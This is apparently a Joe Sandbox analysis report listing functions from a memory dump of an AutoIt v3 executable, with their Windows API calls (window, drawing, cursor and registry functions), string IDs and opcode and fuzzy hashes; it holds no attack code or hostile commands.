                                                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                              • Instruction ID: 238ae73193ba76537cdb47aea0d3327ba3ac5c6879ee3a3372fefe88f0d530c9
                                                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                              • Instruction Fuzzy Hash: 3A0192B9A00609EFCB44DF99C6909AEF7F5FB48310F208599D919A7701E770AE41DB80
                                                                                              Function 04737C50 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                              Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(?), ref: 0045953B
                                                                                              • DeleteObject.GDI32(?), ref: 00459551
                                                                                              • DestroyWindow.USER32(?), ref: 00459563
                                                                                              • GetDesktopWindow.USER32 ref: 00459581
                                                                                              • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                              • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                              • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                              • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                              • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                              • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                              • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                              • _wcslen.LIBCMT ref: 00459916
                                                                                              • _wcscpy.LIBCMT ref: 0045993A
                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                              • GetDC.USER32(00000000), ref: 004599FC
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                              • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                              • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                              • API String ID: 4040870279-2373415609
                                                                                              • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                              • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                              • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                              • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                              Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                              • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                              • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                              • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                              • SelectObject.GDI32(?,?), ref: 00441874
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                              • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                              • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                              • DeleteObject.GDI32(?), ref: 004418D5
                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                              • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                              • String ID:
                                                                                              • API String ID: 69173610-0
                                                                                              • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                              • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                              • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                              • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                              Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?), ref: 004590F2
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                              • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                              • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                              • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                              • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                              • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                              • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                              • API String ID: 2910397461-517079104
                                                                                              • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                              • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                              • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                              • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                              Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                              • API String ID: 1038674560-3360698832
                                                                                              • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                              • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                              • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                              • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                              Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                              • SetCursor.USER32(00000000), ref: 0043075B
                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                              • SetCursor.USER32(00000000), ref: 00430773
                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                              • SetCursor.USER32(00000000), ref: 0043078B
                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                              • SetCursor.USER32(00000000), ref: 004307A3
                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                              • SetCursor.USER32(00000000), ref: 004307BB
                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                              • SetCursor.USER32(00000000), ref: 004307D3
                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                              • SetCursor.USER32(00000000), ref: 004307EB
                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                              • SetCursor.USER32(00000000), ref: 00430803
                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                              • SetCursor.USER32(00000000), ref: 0043081B
                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                              • SetCursor.USER32(00000000), ref: 00430833
                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                              • SetCursor.USER32(00000000), ref: 0043084B
                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                              • SetCursor.USER32(00000000), ref: 00430863
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                              • SetCursor.USER32(00000000), ref: 0043087B
                                                                                              • SetCursor.USER32(00000000), ref: 00430887
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                              • SetCursor.USER32(00000000), ref: 0043089F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$Load
                                                                                              • String ID:
                                                                                              • API String ID: 1675784387-0
                                                                                              • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                              • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                              • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                              • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                              Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                              • GetSysColor.USER32(00000012), ref: 00430933
                                                                                              • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                              • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                              • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                              • GetSysColor.USER32(00000011), ref: 00430979
                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                              • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                              • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                              • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                              • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                              • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                              • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                              • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                              • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                              • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                              • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                              • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                              • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                              • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                              • String ID:
                                                                                              • API String ID: 1582027408-0
                                                                                              • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                              • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                              • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                              • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                              Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseConnectCreateRegistry
                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                              • API String ID: 3217815495-966354055
                                                                                              • Opcode ID: 632589d2a76c64a0923bcd1a4645069594953deaaca638e9f2e4c640ba1a6a29
                                                                                              • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                              • Opcode Fuzzy Hash: 632589d2a76c64a0923bcd1a4645069594953deaaca638e9f2e4c640ba1a6a29
                                                                                              • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                              Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 004566AE
                                                                                              • GetDesktopWindow.USER32 ref: 004566C3
                                                                                              • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                              • DestroyWindow.USER32(?), ref: 00456746
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                              • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                              • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                              • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                              • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                              • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                              • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                              • CopyRect.USER32(?,?), ref: 004568BE
                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
